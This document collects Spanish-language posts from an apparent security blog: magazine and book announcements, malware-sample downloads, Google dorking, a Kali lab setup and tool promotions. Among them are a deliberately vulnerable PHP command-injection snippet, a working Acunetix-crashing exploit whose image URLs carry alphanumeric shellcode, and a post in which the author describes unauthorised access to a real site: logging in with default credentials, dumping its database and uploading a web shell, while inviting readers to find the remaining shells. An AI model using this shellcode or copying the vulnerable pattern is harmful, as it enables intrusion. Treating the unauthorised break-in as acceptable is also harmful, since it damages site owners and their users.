http://img1.wikia.nocookie.net/__cb20120731235840/regularshow/es/images/4/4b/Ks.jpgSras. y Sres., Ladies & Gentelman xD, asi fue como Eugenia hace un momento mando correo xDDD, una forma interesante de llamar la atención aun mas de hacerlo como en una lucha libre. 

Los temas que nos trae solo una muestra:


  • Bloqueos Mutuos, para que no veas a a la chica que te gusta
  • Ingenieria de Software vuela como un avión
  • Europio Engine el amigo de Giugine de Hey Arnold!
  • Desmitificando el concepto de sesiones solo sesiona y ya.
Original Hacker :D nueva versión Disponible! para descargarla ya saben, donde descargar y tener acceso a las anteriores por si no las conocen.



PD: Los nombre son meramente referenciales de lo que trata la entrega ;) solo lo que esta en negrita tomarlo en cuenta el resto es un invento mio.

Regards,
Snifer
Leer Mas
Hace unos días comencé una investigación por mi cuenta (mi papá [leyeron bien, mi papá] se interesó en éste caso y juntos estamos en la investigación) sobre un caso de estafa mediante ingeniería social con la finalidad, como es usual de robar dinero a un usuario.

Para ubicarlos en la historia, todo comienza hace una semana atrás (exactamente el día 20 de mayo) cuando recibo un mensaje privado en Facebook pidiéndome que me contacte con ésta persona de forma urgente a su casilla de correos. Supuse que era una especie de estafa y me decidí a hacerme el inocente y comenzar a interactuar con ésta persona. ¡No voy a contarles lo que sigue en la historia hasta el día de hoy, sino ya no podré realizar mi artículo sobre ésta tema!

Pero .. ¿Que tiene que ver lo del mensaje que conté? 

El día en que recibo el mensaje privado de Facebook mi papá y yo pensamos: - "Sería un buen caso para tratar, así queda demostrado como es la metodología de un atacante cuando desea robar a través de éstas técnicas a un pobre usuario, así que podemos recolectar toda la información posible y luego escribir un artículo". Ahí fue mi primer (y esperemos que último) error: La primer prueba era el mensaje de Facebook y nos habíamos olvidado de sacarle una impresión de pantalla.

Mucho no nos importó, porque sabíamos que no lo había borrado, por lo que fui a mis mensajes de Facebook y .. ocurrió algo no tan esperado.

Para mi mala fortuna, el mensaje había sido marcado como Spam por Facebook.

Así es, por políticas de seguridad, Facebook había eliminado el mensaje. Pero, no está vencido quien aún pelea (o algo por el estilo) y se me ocurrió un nuevo plan (cabe aclarar que ya en éste punto, lamentablemente trabajé solo ya que mi papá se quedaba sorprendido con éstos secretos xD).

Fui a mi buzón de entrada de Facebook, me ubiqué en el mensaje y le dí botón secundario > Inspeccionar elemento.

Inspeccionando el elemento, en éste caso el mensaje Privado.

Para que luego me aparezca la siguiente información.



Hubo un campo que me llamó mucho la atención (el que se encuentra marcado en la imagen de arriba), por lo que me ubiqué en él y luego con el botón secundario me fui a la opción Edit as HTML.

Inspeccionando aún más.

¿Qué obtuve? El mensaje marcado como Spam.

¡Mensaje obtenido!

Por G.- de la redacción de SniferL4bs. [Con mucha ayuda de mi intrépido padre]
Leer Mas
http://www.digitaldiscoveryesi.com/files/slideshow/997_517_Digital_Forensics.JPGUn repositorio forense para los usuarios del pinguino GNU/LINUX A.K.A Tux, el cual nos permite conocer las herramientas que tenemos para el Analisis Forense, en la pagina de Forensic Cert podemos encontrar que cuentan con los repositorios solo por ahora, para RedHat y Fedora haciendo las configuraciones pertinentes en este momento no gozo de una VM para hacer pruebas sera porque no soy fan de Fedora ni RedHat? xD ando en otros lares de las ramas.

Pero bueno lo interesante es que tenemos una biblioteca de referencia para ir viendo las herramientas que tenemos disponibles, esta vez le ire dando una mirada y viendo alguna herramienta que no conozca  y jugar con ella, mietras les dejo la direccion forensics.cert.org


Gracias a @d7n0 por darlo a conocer lo vi en el facelook :)

Regards,
Snifer
Leer Mas
Cada lunes vendremos con un documental video. película, documental o charla que ande disponible referente a Seguridad Informática, o relacionada a ello lo que haremos sera hacer un breve resumen del video, es decir será así lo bueno, lo malo y lo feo, solo que al ser la primera entrada de Inicio do Lunes no haremos dicho review mas todo lo contrario directo con la pelicula Take Down conocida tambien como Hackers 2, donde vemos una etapa de la vida de Mitnick y lo que paso con la pelea de egos con Tsutomu Shimomura.

La pelicula esta basada en el libro Takedown de John Markoff y Tsutomu Shimomura.



Buen inicio de Semana!!

Regards,
Snifer
Leer Mas
http://www.dbametrix.com/img/articles/small/remote-database-services-9.jpgEl señor @migueljimeno96  realizo un script sepsi que permite realizar un escaner  en busca de un Remote Command Execution Scanner.

¿Que es un Remote Command Execution?

A mi buen y mal entender si estoy mal me corrigen ;),es una vulnerabilidad que se debe al uso inadecuado de funciones en PHP, las cuales realizan la ejecución de comandos en el servidor, como ser las que conozco.

exec()
shell_exec()
system
()
 
Un ejemplo de código vulnerable tenemos el siguiente:  (realizado Blackdrake):

  1. <?php
  2.  
  3. //By Jimeno y Blackdrake
  4.  
  5. $objetivo = $_GET['ip'];
  6.  
  7. // Verificamos S.O...
  8.  if (stristr(php_uname('s'), 'Windows NT')) {  
  9.        $cmd = shell_exec( 'ping  ' . $objetivo );
  10.        echo '<pre>'.$cmd.'</pre>';    
  11.    }
  12.  else {  
  13.        $cmd = shell_exec( 'ping  -c 3 ' . $objetivo );
  14.        echo '<pre>'.$cmd.'</pre>';    
  15.    }
  16. ?>
  17.  

Ahora mas o menos ya comprendemos la vulnerabilidad ? si no fuera asi a leer e investigar, ahora si veremos un poco el funcionamiento y lo que lleva el script todo el pack, primero el funcionamiento:
  • Uso: python RCEer.py
El script consta de tres archivos:

1. RCEer.py
2. myheaders.py
3. myvulns.py

Ejemplo de uso:

Tenemos nuestra aplicación web:



Queremos ver si es vulnerable, luego lanzamos la herramienta:



Nos dice que es vulnerable, luego accedemos a la POC para comprobar si se trata de un falso positivo:


Y... ¡ES VULNERABLE!

Descarga del script en el repositorio de Github de Jimeno



Y como lo dice Jimeno:

"No me hago responsable del uso que se haga de esta herramienta, tampoco prometo actualizarla ya que esta es una versión recién programada."

Gracias Jimeno por compartir tu script, y aun mas por hacerme conocer una vulnerabilidad :/, la conocia pero no con su nombre cientifico juacker, la conocia como ejecución de comandos en el servidor o algo asi, por si quieren darle una mirada de donde vino y los invito a que ingresen al foro de Underc0de <- REGISTRENSE!!

PD: No me vengan que es Sabado y no postee la entrada xD, lo siento hoy fue un dia estresadamente estresado, U_U los preparativos para la boda, mañana sale entrada de Hacking Lab o el Lunes xDD les debo.

Regards,
Snifer
Leer Mas
Nuevamente venimos con una entrada relacionada a la serie de Atacando al atacante en esta oportunidad veremos una técnica para evitar los escaneos de juackers con Acunetix, que a veces solo buscan causar daño.


Buscando un poco sobre como evitar a Acunetix di con la entrada en un blog que no lo nombrare ¬¬° supuesto juacker que descubrió la vulnerabilidad, pero no fue así, mas todo lo contrario hizo una traducción de An7isec  poniendo su logo y nombre en las imágenes una pena la verdad, aunque al final me contacte con el e indico que se olvido la traducción debido a una actualización y no se que le creo, pero bueeeee, como dacia en la entrada hare un intento de traducción del post original, lo cual llevare a mis terminos tratando de mantener la calidad del original pero ya saben para mayor referencia ir al post original.


Como se dijo con anterioridad siempre anda algún niño jugando haciendo uso de herramientas de escaneo automático de las cuales tenemos a montones en la red algunas free otras de paga,  las cuales como administradores o desarrolladores de portales web desearimos evitar a toda costa o buscar algo que evite su escaneo. Alguien lo penso?

Ya chema alonso si mal no recuerdo brinda la opción de saltar el escaneo de esta herramienta, o no se donde lo lei en una próxima entrada lo buscare y posteare siguiendo esta entrada, porque se hace contra acunetix simple, es el escaner mas usado y crackeado de todos los tiempos sin ir muy atras tenemos a TorresCrack con 2 grandes aportes de como hacer ingenieria inversa y poder saltar su validación, el PoC es realizado con Acunetix version 8 build (20120704), como dije en una anterior entrada lo que hace Acunetix es indexar o bueno seguir las urls de un lado a otro y partir de este armar el arbol  de directorios, por ello identifica dominios y urls que a simple vista se nos complica obtener siempre y cuando tengamos algo mas fuerte.

Al realizar un escaneo a cualquier sitio tenemos como resultado los enlaces de la página segun an7isec lo que hace acunetixes iniciar una peticion http al sitio a ser escaneado, y muestras los resultados a partir de la respuesta http.   (Creo que lo que dije de buscar los enlaces es mas comprensible a mi manera de entender.)

http://3.bp.blogspot.com/-6B7rL_xeoSU/U1fS3RziyFI/AAAAAAAAALk/wprw4p8yElQ/s1600/acunetix1.png

Un ejemplo de los sitios o dominios externos que hacer el crawling es por ejemplo de lo siguiente:


"<img Src=http://externalSource.com/someimg.png>"
"<a Href=http://externalSource.com/> </ a>"


Ahora viene un bug, el cual no se si actualmente en la version 9 de acunetix persiste, en este momento no tengo en la pc de casa, pero si en el de la oficina :P, mañana o hasta el fincho hare la misma PoC que se expresa aquí para validar, el bug se refiere a que si se utiliza una caden mayor de 268 bytes o mas relacionando a un dominio, Acunetix crashea directamente es decir algo como esto:

<A href= “http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAA”>



En Inmmunity Debugger muestra que EDX crashea a causa de una violacion de acceso (en este punto no ando seguro lo que comprendi si alguien mejora mejor!).

http://2.bp.blogspot.com/-wh9UWu1d0bs/U1f5n3_VMJI/AAAAAAAAAME/GMBaody4yDU/s1600/access.png

El resto de la explicación de este punto prefiero que la vean en la entrada original, el porque simple! no quiero cometeré un error garrafal e indicar mal. Mas detalle del exploit aquí.


Tras ver como lo genera y demas :P, es necesario tener una shell por lo cual se hace uso de Metasploit y se crea con "Alphanumeric Shell", en la PoC hace una llamada a "Calc.exe" tras todo el proceso tenemos un sepsi resultado cuyo resultado es el siguiente.

<img src="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB

0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9

JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP

KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK

UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6

LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X

UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN

KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>


Ahora si ya tenemos nuestro exploit juacker anti juackers mejor dicho ya podemos atacar al atacante ;) de una manera mas especifica, ahora para que funcione el ataque es necesario que agregue la url o el dominio en el escaneo.


¿Qué podemos hacer para hacer que nuestro nombre de dominio sea atractivo?


Aqui nos dan dos ideas..

La primera brindarles un dominio jugoso que ande con algo extraño ;) por ejemplo

ADMIN.ControlManagment.virtualHost.midominio.com

Puede ser algo jugoso para un atacante, como tambien la otra opcion que nos brindan en el post original que es la siguiente, aunque este metodo es muy soso xD, deberiamos de dar algo de imaginacion y cambiar el nombre de los links ;)



"SQLINJECTION"
"XSS"
"CSRF"




<html>

<img src="http://SQLInjection........................................

.....................................................................

.....................................................................

............AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB

0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9

JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP

KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK

UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6

LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X

UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN

KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>



<img src="http://XSS.................................................

.....................................................................

.....................................................................

...">



<img src="http://CSRF................................................

.....................................................................

.....................................................................

....">



<img src="http://DeepScan............................................

.....................................................................

.....................................................................

........">



<img src="http://NetworkScan.........................................

.....................................................................

.....................................................................

...........">



<img src="http://DenialOfService.....................................

.....................................................................

.....................................................................

...............">
</html>





Como pueden ver ya vamos viendo como protogernos  de un scanner bastante intrusivo y violento, como lo dije al principio de la entrada aqui tenemos la PoC en funcionamiento :) ... ...


Si alguien pregunta puedo cambiar la calculadora por una app personalizada, yeah!!! se puede en este punto debemos de crear nuestra propia Shellcode. Cabe resaltar que este exploit esta hecho específicamente para un XP, y aqui de an7i el video.


Actualización: Acabo de ver al personal de Acunetix xDD donde indican que el crash solo sucede en la version 8 y no en la 9 ademas tachin! sucede en las version crackeadas ¬_¬° si claro le diremos que si ;) aun esta por verse si es asi o solo es un feature.

Comentario de Acunetix en Youtube


 · 

We cannot reproduce this crash/code execution with any version of Acunetix WVS v8 or v9.
However, we could reproduce the crash with some cracked versions of Acunetix WVS v8. In v8, the cracked replaced the executable with another executable.


Leer Mas
http://cache0.bdcdn.net/assets/images/book/medium/9781/1187/9781118787311.jpg
Ahora va creciendo el material referente a libros :| me sorprende mi nivel de búsqueda de libros y apilarlos para la lectura posterior,  creo que tengo una enfermedad que no puede detenerse ya que ando ahora metido con el proyecto #USBHackSaw por ahora llenamos la sección en el blog del Mundo loco del Reversing, estoy seguro que a mas de uno le servira en todo sentido como pueden ver el libro es Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing Tools, and Obfuscation


Revisando y googleando un poco llega a un post en Reddit donde hacen alusión a los ejemplos de Malware que  cuenta el libro.

Ya vamos por lo que venimos,  para poder descarga las muestras de malware accedemos al siguiente link, siempre tomando en cuenta lo que nos da la advertencia.



The below .zip file of malware samples is provided to assist in learning from the book "Practical Reverse Engineering" by B. Dang, et al. I am not the author of any of these samples provided for research purposes. Please contact spender@grsecurity.net if you have any objections or concerns regarding the hosting of this educational content. The password on the zip file is "infected".
Download


Mirror por si no logran descargar de la fuente original o bien desaparece  se mantiene el mismo pass:

Mirror Mega

Y por ultimo sin menos preciar el libro en formato epub ;) hay lectores a montones para Win/Linux Calibre una excelente opción o bien hacer uso de Okular como va mi caso.

Descarga Practical Reverse Engineering

Regards,
Snifer
Leer Mas
http://cxo-community.com/images/stories/ProblemasSeguridad.jpgUn paper realizado por Silverhack años atras por decirlo el 2007 lo conoci aproximadamente el 2009 el documento, que fue donde me empezo a llamar la atencion  la informatica forense en este documento nos brinda un panorama bastante exquisito referente al peritaje informatico en entornos Windows para los que iniciamos en esto nos dará el empujon inicial para comenzar y como lo dice SilverHack al inicio del documento.


Este documento no pretende ni tiene la finalidad de convertirse en manual de referencia. Este documento relata los aspectos básicos relacionados en el campo de la informática forense, explicando de una forma simple y concisa las herramientas utilizadas para la  captura de evidencias. También explicará los aspectos técnicos relativos a la arquitectura de un sistema Windows. Probablemente esto ayudará al lector a comprender mejor cómo un sistema Windows recopila y almacena la información,
ayudando también a entender la arquitectura del sistema.

Prohibida la reproducción total o parcial de este texto sin poner la fuente
(http://www.elhacker.net)

"No estoy seguro si, SilverHack es el autor del libro de forense de 0xWord"


Descarga

Regards,
Snifer
Leer Mas
¿ Google Hacking ? 


Lo conocen, escucharon hablar? a que les suena?

Por simple intuición diríamos que suena a algo relacionado a realizar Hacking con ayuda de Google.

Saben que google aparte de ser el buscador mas "grande"  tambien indexa gran cantidad de las paginas que salen a la luz, me refiero que son expuestas de cara a internet, dicha indexación la realiza por medio de su spider  (crawler, araña) el cual va buscando los links de la red entrando por todo lado siempre y cuando le digamos prohibido el paso usted no accede por estos lares.

http://www.premiumseosolutions.com.au/blog/wp-content/uploads/2011/08/fetch-googlebot.jpg



Así que, podemos hacer uso del mismo google con fines no éticos, o éticos segun la percepcion que se le de, la entrada del Sábado presentamos un caso bastante práctico de como nos dejan servido si alguien como lo hice ya un amigo Alberto encontró el site que se encuentra con el deface realizado es decir, con un poco de creativida y un buen uso de Google en este caso podemos explotar mas allá.

 ¿Es verdad que a través de Google se pueden descubrir vulnerabilidades específicas?

Debemos de tomar en cuenta que hacer hacking con Google no solo se puede hacer con el, tenemos tambien a Bing, Yahoo dedicaremos algunas entradas a esto posteriomente.

El uso que se de a Google depende como se use podemos obtener credenciales de routers Mikrotik, buscar una aplicación Vulnerable que se encuentra aun sin el parche adecuado, y llegar a realizar un barrido en busca de información para realizar ataques posteriores, a todo ello para no ir probando o viendo las variables se creo Google Hacking Data Base de Johnny Long en el cual se actualiza regularmente con los dorks que permiten obtener información para ello nos dirigimos a exploit-db.com/google-dorks
con ello ya tendremos acceso a las dorks y poder jugar.

Recuerden hacer un uso adecuado ;).

Regards,
Snifer
Leer Mas
Segundo intento de logo para Craft Books. La verdad es que como el primero salió algo soso y Snifer me indicó que quería salir bebiendo café. Aunque creo que me he pasado de animado con este otro xD


Espero que os guste mas que el anterior y como se acerca el verano que menos xD

Sed Buenos ;) 
Leer Mas
Por mas que uno no quiera portarse bien, existen momentos que nos ponen las cosas en porteria y sin arquero como se dice, listo para meter gol.

Es por ello que uno quiere portarse bien y algunos desarrolladores no, nos dejan mas todo lo contrario nos dejan las puertas abiertas para atacar, como también los administradores de los portales,  llegan a darnos la tentación necesaria para ocasionar daños.

Esto a que viene, hace unos días un amigo mio realizo la siguiente publicación  en su blog La misma Password en la cual dije tendra otras vulnerabilidades? extras....  y sorpresa no fue asi con anterioridad ya fue defaceado aun se tiene el index que lo colgarón como podemos observarlo en la siguiente captura.



Al ir notanto esto, identifique algo mas que cuenta con 2 shells subidas, en el host tras un par de pruebas identifique un foro el cual viene con contraseñas genéricas, si señores el clásico de clásicos  y sorpresa acceso al foro.


No llegue a trastear mas que esto si valide un par de xss, y logre realizar un dumpeo de la base de datos, subir otra shell la cual posteriormente la elimine, las otras shells que identifiqué siguen ahi rondando, si alguien se toma el tiempo necesario para buscar las encontrara estoy totalmente seguro de ello.




Y como pueden observar en estas capturas anteriores tenemos algunas debilidades adicionales, lo que me llamo bastante la atencion fue ver la carpeta css con algunos datos adicionales los cuales son de acunetix! algún hijo de juacker anda haciendo escaneos automáticos, llevando como resultado una inestabilidad general  en el sitio.

Aqui tenemos otro portal donde se tiene acceso al archivo de php que nos brinda informacion adicional un poco de la configuración





Podemos ver que las fallas se repiten iteradamente, sea por vagos, flojos o hacer a la que nos criamos con tal que funcione listo! que dejen de molestar a veces tenemos este tonto pensamiento cuando desarrollamos algo, lo mejor es ponernos a pensar y comenzar a desarrollar bien los que desarrollamos o bien si la entrada lo lee algun desarrollador no juacker porfavor tomen el cuidado necesario para securizar sus ambientes de producción no dejen brechas de seguridad.

 Que en ocaciones como esta uno a veces quiere probar :D....

Regards,
Snifer
Leer Mas
Con esta viñeta creo que mi miedo a las arañas desaparecerá!....

Si como lo leen tengo, miedo a las Arañas, y creo que apartir de ahora no matare a ninguna ya que me salvara el dia de mañana.



Es viernes toca descansar ;) y si no tenia entrada para el día de hoy.

Regards,
Snifer
Leer Mas
¡ Buenas tardes compañeros !

En ésta ocasión les traigo un aporte excelente sobre herramientas útiles a la hora de un análisis de penetración (desde ahora llamado Pentest, para no aceptar malos usos del significado en español) en el cual, cada herramienta va a estar situada en la fase que le corresponda. Con el siguiente diagrama, se va a entender a la perfección.

La metodología de un Pentest, está dada en varias fases. En ésta ocasión se verán las siguientes:

Accediendo a cada una de las fases anteriores, se podrán observar herramientas seleccionadas por el autor y en varias de ellas, manuales básicos de uso.
Un poco por dentro, como se ve la web.

Si bien el material es algo viejo, el sitio web es éste y es del equipo de 0day Security.

¡ Manos a la obra !

Por G.- de la Redacción de SniferL4bs.
Leer Mas

Reverse Engineering for Beginners book

... is freely downloadable 
Praise for the book:
  • Its very well done .. and for free .. amazing.' (Daniel Bilar, Siege Technologies, LLC.)
  • ...excellent and free (Pete Finnigan, Oracle RDBMS security guru.).
  • ... book is interesting, great job! (Michael Sikorski, author of Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software.)
  • ... my compliments for the very nice tutorial! (Herbert Bos, full professor at the Vrije Universiteit Amsterdam.)
  • ... It is amazing and unbelievable. (Luis Rocha, CISSP / ISSAP, Technical Manager, Network & Information Security at Verizon Business.)
  • Thanks for the great work and your book. (Joris van de Vis, SAP Netweaver & Security specialist.)

 Tras esta breve introduccion del autor acerca del libro y los comentarios que fue recibiendo ahora si comenzamos, vi este libro en twitter el cual es de fuente abierta disponible para acceder a el como dice su nombre Ingenieria Inversa para principiantes, al cual podemos acceder por el siguiente link RE for beginners.pdf ahora si gustan tener a la mano los ejemplos y demas que son llevados en el libro tenemos a disposicion el repositorio en github, gitorious, Google Code, BitBucket, y SourceForge! muy aparte de todo el Autor indica claramente que todo error o mejora podamos comentarle la misma idea de CraftBooks! y la logica que queremos incorporar con Craft'.


Lo interesante y destacable del libro, que le di una mirada rapida y comenzamos desde cero paso  a paso muy aparte de todo notaran que viene con ejercicios y practicas todo ello lo tenemos disponible por ejemplo aca en el repo de GitHub ademas las fuentes en LaTeX traduccion :). Y algo mas que tenemos por aqui es el material extra como son los ejercicios, y la solucion de los ejercicios.

Le comentare al gringo la posibilidad de traducir a español el libro y poder colaborar a nuestra manera...

Regards,
Snifer
Leer Mas
Como sabéis Craft Books es la editorial libre que hemos lanzado hace nada Snifer y yo, donde podéis colaborar en nuestro primer libro No tengas miedo Tienes solo una Foca.  Hoy me he animado ha hacer el primer logo. Aquí os lo dejo ^^ 



Espero que os guste y Sed Buenos ;)
Leer Mas
Como todos sabran el pasado fin de semana antes de ayer, se realizo el DragonJarCon y fue lanzado una suite de seguridad bueno no suite o no se como llamar diria un repositorio de herramientas para Android para poder volverla una herramienta de pentesting, a continuación les dejo con el video de la presentacion de PengoDroid.



Y para poder descargar el repositorio los links

Regards,
Snifer
Leer Mas
En esta primera entrada abordaremos todo lo relacionado a la teoria que necesitaremos para realizar nuestro laboratorio como tambien lo relacionado a Hardware y Software.

Andaremos con dos entornos uno dedicado para virtualización y otro que nos servira como host de ataque y virtualización, el primero lo veremos posteriormene ya que necesito revivir a mi vieja Nevaeh.

Nos basaremos para  toda la sección con un equipo en el cual podamos virtualizar ambientes controlados para ello tomaremos en cuenta uno con las siguientes caracteristicas como base.


Caracteristicas mínimas
  • Procesador como mínimo 1.7GHz.
  • 100 GB disponibles para poder disponer de el, y su fuese posible un HD externo para ir jugando mas alla ;).
  • 2 GB de RAM como mínimo.
En este proceso yo trabajare con mi laptop que tiene unas caracteristicas elevadas, pero con 2 GB de Ram bastará.

Tras este proceso lo que necesitamos es hacer uso de un virtualizador (software para virtualizar) el cual nos permitira tener corriendo sistemas operativos en el mismo equipo compartiendo las caracteristicas del anfitrión  siempre estando limitado a ello, puesto que comparten los recursos. 

Lista de Virtualizadores

La lista de virtualizadores es reducida ya que tenemos mas de ellos, pero se diría que son los mas conocidos o usados.


En todas las entradas lo haremos con VirtualBox para poder instalarlo nos dirigimos a la Web Oficial de Virtual Box y procedemos a realizar la descarga segun el SO que tengamos, como saben yo ando con Manjaro asi que andare en todas las entradas con este SO como principal.

Montando nuestro arsenal

Ahora si viene lo interesante para poder montar nuestro laboratorio, en esto tenemos dos opciones.
  1. Montar una distro de seguridad.
  2. Instalar nosotros mismos las herramientas.
Ventajas y Desventajas

Si queremos todo armado podemos irnos por la distro de seguridad la cual tenemos a montones para elegir, ademas de ello ya vendra con todo configurado y listo para el ataque. La desventaja de ello es que no tendremos el conocimiento de como se instala alguna herramienta, que son las dependencias o demas trajes siempre y cuando recien estes comenzando con este mundo.

Por otro lado si decidimos montar en un SO base como mi caso Manjaro, entraremos a todo un mundo de conocimiento, porque conoceremos mas de las herramientas, aprendiendo a diario lo negativo de esto el tiempo que tendremos que invertir para que funcione en algunos casos sera moroso en otros no falta con lanzar desde la terminal e instalara todo tranquilo.....

Algo por decirles ahora en Manjaro ando con Nmap, Metasploit, y algunos scripts funcionando perfectamente aclarando que me tomo un poco de pelea la instalación de Metasploit.

Windows o Linux

imagenes windows vs linux
Aquí todo depende de ti como quieras aprender, en Hacking Lab Project manejaremos en primera instancia Linux posterior a ello, lo haremos en Windows haciendo uso de PengoWin el arsenal recopilado por Oscar Banchiero al cual le dedicaremos un par de post en Hacking Lab Project, donde haremos todo un pentesting a un entorno vulnerable con esta suite recopilada.

Ya con este mini FAQ, podremos iniciar nuestra travesia en montar nuestro pequeño Lab de Hacking a este punto supongo que ya tienen instalado Virtual Box o el que hayan elegido.


Si no lo tienen que esperan para instalar?

Eligiendo nuestra Sistema Operativo de aprendizaje



Despues de esto toca elegir el sistema operativo que usaremos para realizar nuestras pruebas de intrusión como ven en las capturas ando ahi con algunos SO, entre ellos Yndra, Mint, XP y Kali.

downloadsSeguro se dieron cuenta que distribución de Hacking usaremos, si pensarón en Kali esa misma será posteriormente daremos un detalle  mas sobre otras distribuciones de seguridad, pentesting o Hacking Wireless.

Para poder descargar Kali nos vamos a la página oficial  kali.org y podrán observar las descargas según su arquitectura proceden a descargar ya sea de 32 o 64 bits.

Kali Linux 64 Bit 1.0.6 Downloads & sha1sum
Kali Linux 32 Bit Downloads & sha1sum
Verificando su Hash

Un punto interesante es los numeritos (el Hash) que tenemos el cual nos permite verificar o validar la integridad de la iso, que este sin ningun inconveniente, para ello haremos uso de la terminal tras realizar la descarga haremos la verificación, con sha1sum kali.iso y como ven a continuación si la descarga no sufrio algun error tendremos el mismo hash.

[snifer@rizel Desktop]$ sha1sum kali-linux-1.0.6-i386.iso 
518aad75c2c5f1c60b2068760712f7e82c02d703  kali-linux-1.0.6-i386.iso

Pero si nos dan md5? u otro hash??

Hacemos lo mismo como con sha1sum, solo que seria md5sum y como corresponda.

¿Ando en Windows con que herramienta puedo hacerlo?

Por si te animaste a realizar todo este proceso en Windows puedes hacer uso de MD5-SHA Checksum Utility u otra herramienta buscando en google lo encontrarás.

Hasta aquí ya tenemos la base para nuestro laboratorio de seguridad la instalación se los dejo en sus manos, y bien  entre semana realizare un video de instalación de Kali Linux, luego seguiremos configurando el entorno.

Regards,
Snifer
Leer Mas
Si que se ve sepsi el python millonario :D


Otra entrada siguiendo al mundo sepsi, de Python solo que esta va a la sección que se inicio con algunos libros y documentos que fue Ninja Python with Hackers I. Esta entrada se viene de la mano de exploiter.co donde andan con un curso de Hacking con Python lo mas destacable de esto es que son gratuitos de acceso libre por ahora andan solo 2 videos la primera una introducción y la segunda con algo de control de flujos y demas detalles.




Solo queda seguir esperando y poder conocer mas de python, la verdad que les recomiendo, este lenguaje es mi favorito lo mejor que pude hacer este año es llevarlo a este lado al gringo de Albert State_X si entran a su blog pueden ver como anda con Python.

Entradas anteriores de Ninja Python with Hackers
 
Ninja Python with Hackers I
Ninja Python with Hackers II


Leer Mas
1gb de informaciónVengo a presentar el trabajo que anda realizando @1GbDeInfo el cual recientemente presento en Gr2Dest una charla sobre XSS en el cual nos dio un muestreo sobre este tipo de ataques del mismo modo el loco ese, que le digo de cariño giguita ;) aunque el no lo sepa.


Del mismo modo en su blog el cual recomiendo bastante, como lo dije en un tweet la semana pasada para todo Windolero el mejor lugar donde poder trastear es el blog de Roberto donde podremos ver virtualización servidores y todo lo relacionada en ese mundo.A Continuaciones dejo en el post los videos de Roberto relacionado a XSS, como tambien las entradas en su blog.

Su presentación en T3chFEst de este año para que le puedan dar una mirada.



Y del mismo modo la iniciacion de XSS



Y para no desmeritar las entradas en el blog relacionadas a XSS 1gbdeinformacion.

No se olviden andar por su blog! y seguirlo en twitter que a momentos le doy troya porque se olvidan de mi.

Regards,
Snifer


Leer Mas
TheOriginalHackerNro5
La pasada semana Eugenia mando un correo y no fue hasta hace un par de dias atras que recien lo leí, como ando perdido como un ciervo en tiroteo, lo traemos en el blog, como se dice mas vale tarde que nunca.

Esta entrega que viene algo retrazadita :P el numero 4 de The Original Hacker,debido a la explicación que fue dada por la señorita referente al espacial edición de Debian Hackers Elementals.






Lo que nos traé:
  • Bash scripting avanzado
  • Seguridad informática
  • Ingeniería de software
  • Europio engine lab

Revistas The Original Hacker


  The Original Hacker N° 5

Regards,
Snifer



Leer Mas
Revisando CoderWall me llamo la atencion un tip post como quieran llamarlo, de Steve Jansen en el cual compartio este hack para realizar un ignore a los espacios en blanco cunado hacemos un diff en Github. 

La solución para hacer este hack es adicionar la bandera ?w=0  a continuación vemos el ejemplo con un "Hello World"



Screenshot of a Hello, World! Javascript code file in GitHub

Al realizar el diff, del archivo podemos observar que por el espacio nos notifica, a quien no le ha pasado?

Screenshot of the diff of the Hello, World! Javascript code file after adding leading whitespace and deleting trailing whitespace 

 Tras ingresar la bandera al final por si acaso es esta -> ?w=0

